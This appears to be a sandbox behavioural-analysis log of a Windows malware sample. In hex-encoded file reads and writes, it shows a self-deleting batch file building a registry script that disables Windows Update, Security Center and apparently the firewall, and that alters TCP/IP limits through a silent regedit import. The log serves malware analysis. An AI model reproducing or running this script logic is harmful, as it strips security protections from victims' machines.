File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589715266
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589716006
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589716178
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1589716800
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589723231
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589723407
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74	success or wait	1589723584
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589727971
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589728375
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589734078
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589734590
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589735259
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589735431
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 66 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 0D 0A	success or wait	1589735839
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1589741707
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589748705
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589749429
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589749602
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 24 Value: 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 0D 0A	success or wait	1589753946
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38	success or wait	1589761187
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589781708
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589782357
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589782529
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1589783191
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72	success or wait	1589793532
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589801444
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589802207
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589802381
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 60 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 0D 0A	success or wait	1589802801
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66	success or wait	1589809545
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589817424
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589818095
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589818267
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 24 Value: 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 0D 0A	success or wait	1589818652
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C	success or wait	1589828267
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589847769
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589855074
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589855266
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1589855854
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F	success or wait	1589903086
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589911523
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589912335
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589912500
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 73 Value: 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 0D 0A	success or wait	1589913005
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53	success or wait	1589920871
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 25 Value: 22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1589928877
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589928877
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589928877
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589928877
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72	success or wait	1590011373
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590092298
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590092949
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590093102
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1590118868
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68	success or wait	1590134663
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590139997
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590140671
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590144035
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 74 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 0D 0A	success or wait	1590144532
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C	success or wait	1590154131
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590173222
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590173870
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590174023
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 30 Value: 22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 0D 0A	success or wait	1590174420
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25	success or wait	1590180796
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590188855
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590189491
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590189657
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 35 Value: 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 0D 0A	success or wait	1590190037
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25	success or wait	1590196442
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590213937
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590214578
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590214743
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 36 Value: 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 0D 0A	success or wait	1590228709
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53	success or wait	1590244912
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590250201
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590252725
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590261996
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 30 Value: 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 0D 0A	success or wait	1590262601
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1590278218
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1590301263
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1590302174
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1590302371
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1590306612
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1590313884
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1590367073
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 880000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1590372693
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1590389347
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 880000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1590398009
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1590461316
Section loaded	Path: C:\WINDOWS\regedit.exe Access: write and read and execute Type: commit Baseaddress: 9B0000 Size: 147456 Protection: execute Mapped to pid: own pid	success or wait	1590532822
Section loaded	Path: C:\WINDOWS\regedit.exe Access: query and read Type: commit Baseaddress: 9B0000 Size: 147456 Protection: readonly Mapped to pid: own pid	success or wait	1590557406
Section loaded	Path: C:\WINDOWS\regedit.exe Access: write and read and execute Type: commit Baseaddress: 9B0000 Size: 147456 Protection: execute Mapped to pid: own pid	success or wait	1590580722
Section loaded	Path: C:\WINDOWS\regedit.exe Access: query and read Type: commit Baseaddress: 9B0000 Size: 147456 Protection: readonly Mapped to pid: own pid	success or wait	1590597654
Section loaded	Path: C:\WINDOWS\regedit.exe Access: query and read Type: commit Baseaddress: 880000 Size: 147456 Protection: readonly Mapped to pid: own pid	success or wait	1590659427
Process created	PID: 1456 Path: C:\WINDOWS\regedit.exe Cmdline: REGEDIT /S C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Createflags: suspended	success or wait	1590669154
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1599447349
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point	success or wait	1599472356
File deleted	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1599473021
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 44 45 4C 20 25 30 0D 0A 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1599500497
File opened	Path: c:\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident	success or wait	1599517510
File opened	Path: c:\sdfeww.bat Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point	success or wait	1599518316
File deleted	Path: C:\sdfeww.bat	success or wait	1599525726
File opened	Path: c:\sdfeww.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	wait	1599535891
File write	Path: 1188 Offset: none Length: 33 Value: 54 68 65 20 62 61 74 63 68 20 66 69 6C 65 20 63 61 6E 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E 0D 0A	invalid handle	1599542891

Analysis File: regedit.exe PID: 1456 Parent PID: 1188

Sections

General
Start time:	07:41:12
Start date:	21/09/2011
Path:	C:\WINDOWS\regedit.exe
Commandline:	REGEDIT /S C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg
Imagebase:	0x1000000
File size:	146432 bytes
MD5 hash:	058710B720282CA82B909912D3EF28DB

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	success or wait	1	100C005

File read
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	2	52 45	success or wait	1	100C056
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	65536	52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	success or wait	1	100AB06
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	65536	52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	3	100AB06

Other file operations
File Path	Disposition	Data	Ascii Data	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	PositionInformation	Offset: 0		success or wait	1	100C092

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1C0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	230000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	280000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\comdlg32.dll	write and read and execute	image	763B0000	299008	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
C:\WINDOWS\system32\authz.dll	query and write and read and execute	image	776C0000	73728	own pid	read write	success or wait	1
C:\WINDOWS\system32\aclui.dll	query and write and read and execute	image	71550000	126976	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\ulib.dll	query and write and read and execute	image	71FA0000	282624	own pid	read write	success or wait	1
